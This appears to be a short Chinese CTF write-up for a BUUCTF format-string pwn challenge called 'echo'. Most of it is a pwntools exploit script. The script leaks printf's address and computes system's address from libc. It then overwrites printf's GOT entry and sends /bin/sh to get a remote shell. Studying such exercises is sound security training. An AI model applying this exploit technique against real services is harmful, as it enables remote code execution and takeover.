格式化字符串,跟以前差不多,如果说刚开始泄露system的got其实是不对的,那个时候的值是错误的,这里就涉及到got表与plt表的知识了,应该以前也学过问题不大
from pwn import*from LibcSearcher import*context.log_level = 'debug'libc = ELF('libc-2.232.so')#io = process('./echo')io = remote("node4.buuoj.cn",28828)elf =ELF('./echo')def debug():gdb.attach(io)pause()printf_got = elf.got['printf']system_got = elf.got['system']payload = p32(printf_got)+"%7$s"io.sendline(payload)printf_addr = u32(io.recvuntil('\xf7')[-4:])#libc= LibcSearcher('printf',printf_addr)system_addr = printf_addr-libc.sym['printf']+libc.sym['system']#system_addr = u32(io.recvuntil('\xf7')[-4:])+0x22860print("system:"+hex(system_addr))payload =fmtstr_payload(7,{printf_got: system_addr})io.sendline(payload)#debug()io.sendline("/bin/sh\x00")io.interactive()
若有收获,就点个赞吧
0 人点赞
